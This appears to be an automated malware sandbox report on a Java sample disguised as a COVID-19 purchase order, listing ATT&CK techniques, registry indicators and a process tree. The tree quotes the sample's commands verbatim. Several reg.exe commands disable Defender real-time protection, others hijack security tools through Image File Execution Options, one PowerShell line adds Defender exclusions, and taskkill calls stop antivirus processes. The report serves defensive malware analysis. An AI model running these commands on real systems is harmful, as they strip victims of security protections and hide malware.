
Hidden Files and Directories

T1158

pid	Process
1800	attrib.exe
1872	attrib.exe
1812	attrib.exe
1820	attrib.exe
1840	attrib.exe
1264	attrib.exe
1808	attrib.exe
1856	attrib.exe

Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe

Sets file execution options in registry 2 TTPs 32 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe\debugger = "svchost.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe\debugger = "svchost.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe\debugger = "svchost.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe\debugger = "svchost.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe\debugger = "svchost.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe\debugger = "svchost.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe\debugger = "svchost.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe\debugger = "svchost.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe\debugger = "svchost.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe\debugger = "svchost.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe\debugger = "svchost.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe\debugger = "svchost.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe\debugger = "svchost.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe\debugger = "svchost.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe\debugger = "svchost.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe\debugger = "svchost.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe	reg.exe

C:\Windows\system32\java.exe
java -jar "C:\Users\Admin\AppData\Local\Temp\PO For-COVID-19 Products.jar"
1⤵
- Suspicious use of WriteProcessMemory
- Adds Run entry to start application
- Drops desktop.ini file(s)
- Suspicious use of SetWindowsHookEx
- Loads dropped DLL
- Drops file in System32 directory
PID:900
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1628
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:804
- - C:\Windows\System32\Wbem\WMIC.exe
    WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:764
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1104
- - C:\Windows\System32\Wbem\WMIC.exe
    WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /Format:List
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1080
- C:\Windows\system32\attrib.exe
  attrib +h C:\Users\Admin\Oracle
  2⤵
  - Views/modifies file attributes
  PID:1812
- C:\Windows\system32\attrib.exe
  attrib +h +r +s C:\Users\Admin\.ntusernt.ini
  2⤵
  - Views/modifies file attributes
  PID:1820
- C:\Windows\system32\attrib.exe
  attrib -s -r C:\Users\Admin\rMnZL\Desktop.ini
  2⤵
  - Drops desktop.ini file(s)
  - Views/modifies file attributes
  PID:1840
- C:\Windows\system32\attrib.exe
  attrib +s +r C:\Users\Admin\rMnZL\Desktop.ini
  2⤵
  - Drops desktop.ini file(s)
  - Views/modifies file attributes
  PID:1264
- C:\Windows\system32\attrib.exe
  attrib -s -r C:\Users\Admin\rMnZL
  2⤵
  - Views/modifies file attributes
  PID:1808
- C:\Windows\system32\attrib.exe
  attrib +s +r C:\Users\Admin\rMnZL
  2⤵
  - Views/modifies file attributes
  PID:1856
- C:\Windows\system32\attrib.exe
  attrib +h C:\Users\Admin\rMnZL
  2⤵
  - Views/modifies file attributes
  PID:1800
- C:\Windows\system32\attrib.exe
  attrib +h +s +r C:\Users\Admin\rMnZL\Suteu.class
  2⤵
  - Views/modifies file attributes
  PID:1872
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1624
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:300
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:32
    3⤵
    - Checks for installed software on the system
    PID:524
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "ProcessHacker.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1664
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\rMnZL','C:\Users\Admin\AppData\Local\Temp\','C:\Users\Admin\jitsib64.dll','C:\Users\Admin\rMnZL\lib\bridj-0.7.0.jar','C:\Users\Admin\Google Chrome' -ExclusionExtension 'jar','exe','dll','txt','hta','vbs','jpg','jpeg','png','js','doc','docx','pdf','scr' -ExclusionProcess 'java.exe','javaw.exe','reg.exe','regedit.exe','tasklist.exe','netstat.exe','cmd.exe','netsh.exe','taskkill.exe'"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1576
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:1924
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  2⤵
  PID:1904
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:1952
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:1972
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:2004
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:1492
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:864
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:576
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:1296
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1120
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1764
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:32
    3⤵
    - Checks for installed software on the system
    PID:1832
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:764
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:1516
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:1852
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MSASCuiL.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1368
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:1792
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:1788
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:1856
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:1932
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:1104
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:1956
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:1920
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:2040
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MSASCui.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1644
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1904
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic /Node:localhost /Namespace:\\root\cimv2 Path Win32_PnpSignedDriver Get /Format:List
    3⤵
    PID:1972
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:768
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:668
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:32
    3⤵
    PID:1648
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1824
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:64
    3⤵
    PID:1388
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:32
    3⤵
    PID:1788
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1856
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:64
    3⤵
    PID:1628
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:32
    3⤵
    PID:2028
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MsMpEng.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1572
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2040
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:64
    3⤵
    PID:344
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:32
    3⤵
    PID:1560
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1528
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:64
    3⤵
    PID:764
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:32
    3⤵
    PID:1900
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:660
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:64
    3⤵
    PID:1784
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:32
    3⤵
    PID:780
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1516
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:64
    3⤵
    PID:2032
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:32
    3⤵
    PID:1940
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1696
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:64
    3⤵
    PID:1664
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:32
    3⤵
    PID:1720
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1648
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:64
    3⤵
    PID:1980
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:32
    3⤵
    PID:1960
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MpUXSrv.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1892
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:544
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:64
    3⤵
    PID:1644
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:32
    3⤵
    PID:1312
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2028
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:64
    3⤵
    PID:892
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:32
    3⤵
    PID:1804
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1932
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1560
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:32
    3⤵
    PID:1032
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:764
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1704
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:32
    3⤵
    PID:1784
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1532
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:64
    3⤵
    PID:1496
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:32
    3⤵
    PID:332
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1572
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Office14.PROPLUS" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1480
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Office14.PROPLUS" /reg:32
    3⤵
    PID:1088
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1672
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:64
    3⤵
    PID:1664
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:32
    3⤵
    PID:1104
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2024
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1492
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:32
    3⤵
    PID:1524
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MpCmdRun.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1564
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1828
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:64
    3⤵
    PID:1796
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:32
    3⤵
    PID:888
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1116
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1168
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}" /reg:32
    3⤵
    PID:344
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1056
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:592
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:32
    3⤵
    PID:1296
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1100
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1852
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:32
    3⤵
    PID:1792
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1704
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F06417080FF}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:776
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F06417080FF}" /reg:32
    3⤵
    PID:1968
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:332
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1812
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:32
    3⤵
    PID:1388
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "NisSrv.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1940
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1816
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:2044
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:32
    3⤵
    PID:612
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1504
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1992
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:32
    3⤵
    PID:2036
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1920
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0170800}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:284
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0170800}" /reg:32
    3⤵
    PID:1564
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1576
